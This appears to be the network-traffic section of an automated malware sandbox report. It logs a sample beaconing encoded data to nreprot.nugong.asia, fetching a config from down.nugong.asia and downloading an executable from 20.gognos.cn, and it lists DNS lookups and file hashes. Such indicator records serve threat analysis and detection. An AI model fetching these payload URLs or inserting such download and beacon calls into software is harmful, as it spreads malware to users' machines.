GET http://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54ac91928c61e918a185bb992835b01fa10bd6c641ab008c60e4ecd305bdb80e3050a4c5cf17d6beccf4ecd305bdb80e305a6bbaa3b66534e9815ae5e4bcd5ae5b7a6b96fef7b7192eea02bb7f045e434ca5b1f5dbf76a20595d2e3f4c42b7ccc01520bf2a45afe5a8d13e8874bcb3ed077165384096f39202d71b8c7342afad0c632f20fb52a1542e6732afc1547c3d313799c6898354a43bed33d4415576d4b1cfc5937a57a725f04d9d002f80b96a80d6096198579ba176b2dd3dd34e2654138c3c74eaffdbab1eca7345df4a212a2d89537234fb202a103c86aad152ad5bf4a7f55be0402d4f4f48cb7a85b64d4458731e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477844819e5939ff73f019a8fac072fbe18906ab55a0b71583b5d1aeef201146d6e7c6c8f5173bd3b4ad2ce4886175f658a9dbea0ae7578ed85489aa223d4461dde30b69a660643a7d6e6c7e32674936ed306bf3d8daa99b98588b9f7dd742eeb9915cc5d67cbcbb0e7e39c75ce0853417e13a3c1bb75b8438a618438205329eafe7252da6a5678ce540b4ca7ff4ef710ea4c18c7b1f75c0ef0a65def78aa2ec441fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12HTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/psexe.txtHTTP Response
200 -
451.3kB 12.5MB 8946 8930
HTTP Request
GET http://20.gognos.cn:59116/deodej2d0.exeHTTP Response
200
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
4.159.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
241.154.82.20.in-addr.arpa
-
62 B 392 B 1 1
DNS Request
down.nugong.asia
DNS Response
116.163.24.195123.12.213.243119.188.86.1941.62.64.68122.189.171.55221.15.67.10542.7.60.104110.249.196.10136.248.54.85119.167.229.212116.172.148.7125.39.165.235218.29.205.139123.12.213.187123.12.235.196
-
74 B 106 B 1 1
DNS Request
114.114.114.114.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
208.194.73.20.in-addr.arpa
-
71 B 125 B 1 1
DNS Request
254.20.238.8.in-addr.arpa
-
73 B 132 B 1 1
DNS Request
195.24.163.116.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
41.110.16.96.in-addr.arpa
-
56 B 158 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.20013.107.21.200
-
73 B 106 B 1 1
DNS Request
200.197.79.204.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
26.35.223.20.in-addr.arpa
-
62 B 94 B 1 1
DNS Request
apps.game.qq.com
DNS Response
101.227.134.49101.227.134.27
-
62 B 122 B 1 1
DNS Request
ocsp.digicert.cn
DNS Response
47.246.48.205
-
73 B 132 B 1 1
DNS Request
49.134.227.101.in-addr.arpa
-
72 B 143 B 1 1
DNS Request
205.48.246.47.in-addr.arpa
-
59 B 144 B 1 1
DNS Request
sp1.baidu.com
DNS Response
104.193.88.77104.193.88.123
-
72 B 126 B 1 1
DNS Request
77.88.193.104.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
226.20.18.104.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
226.21.18.104.in-addr.arpa
-
68 B 300 B 1 1
DNS Request
ocsp.trust-provider.cn
DNS Response
117.27.246.96119.36.90.16436.143.236.736.248.38.100111.13.153.152111.48.138.18111.206.23.199112.50.95.96
-
72 B 134 B 1 1
DNS Request
101.14.18.104.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
101.15.18.104.in-addr.arpa
-
72 B 125 B 1 1
DNS Request
96.246.27.117.in-addr.arpa
-
138 B 3
-
184 B 2
-
68 B 125 B 1 1
DNS Request
2.2.2.234.in-addr.arpa
-
74 B 131 B 1 1
DNS Request
211.112.123.233.in-addr.arpa
-
60 B 1
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
59.128.231.4.in-addr.arpa
-
116 B 148 B 2 2
DNS Request
20.gognos.cn
DNS Request
20.gognos.cn
DNS Response
222.173.195.26
DNS Response
222.173.195.26
-
72 B 126 B 1 1
DNS Request
126.179.238.8.in-addr.arpa
-
146 B 262 B 2 2
DNS Request
26.195.173.222.in-addr.arpa
DNS Request
26.195.173.222.in-addr.arpa
-
60 B 1
-
60 B 1
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
88KB
MD57d4b72dff5b8e98dd1351a401e402c33
SHA140810fb6eee8856b1884ecb528c88b97e447c5d8
SHA256467ce33b5145c6e71499f32139f14d81b47c38f11dca26b330367add263dba12
SHA5125a26e5e22ad1005e67f6b66187df4e6f75f1b611b2c8d615af34bd61e94fd48fc64b606e7c43d608d112096c7bbaa8fddfc8a9acb603ab137e71d85783b98fd5
-
Filesize
88KB
MD57d4b72dff5b8e98dd1351a401e402c33
SHA140810fb6eee8856b1884ecb528c88b97e447c5d8
SHA256467ce33b5145c6e71499f32139f14d81b47c38f11dca26b330367add263dba12
SHA5125a26e5e22ad1005e67f6b66187df4e6f75f1b611b2c8d615af34bd61e94fd48fc64b606e7c43d608d112096c7bbaa8fddfc8a9acb603ab137e71d85783b98fd5
-
Filesize
11.6MB
MD55244c87dbafa1f764b258766005dea73
SHA184cb8b4fb3e0910cfecfb31b6fa54c16d940e703
SHA256077035f93ddc3ac5a8b5631d43826baf7722256eb1c4716b3c2567f07379bc40
SHA51254d64d32e73e2752cdf9a110db17ad64574eb072df0ed0dc34a7e4bc469c03aa79ef7d45465e279ef85d5fc6b33a1b750b181476cdea7ea98898ddba9aa60438
-
Filesize
271KB
MD552f24bd4d3d617057481e5d25f34fbed
SHA118328882cc8204ab3842f4264983a98963f8b11e
SHA256b1874596a33641cd412dd227c45f9c2b38208ace88af44af95cd8e402cac705c
SHA512033f6b83f0a6446fd35cccffc2430375014ff11e75b8969e3f8a7b0e384b653dba93a1e16bf48907d5e1d840261388c4048b8e64e0fd7ba96fece67c65c096cf
-
Filesize
271KB
MD552f24bd4d3d617057481e5d25f34fbed
SHA118328882cc8204ab3842f4264983a98963f8b11e
SHA256b1874596a33641cd412dd227c45f9c2b38208ace88af44af95cd8e402cac705c
SHA512033f6b83f0a6446fd35cccffc2430375014ff11e75b8969e3f8a7b0e384b653dba93a1e16bf48907d5e1d840261388c4048b8e64e0fd7ba96fece67c65c096cf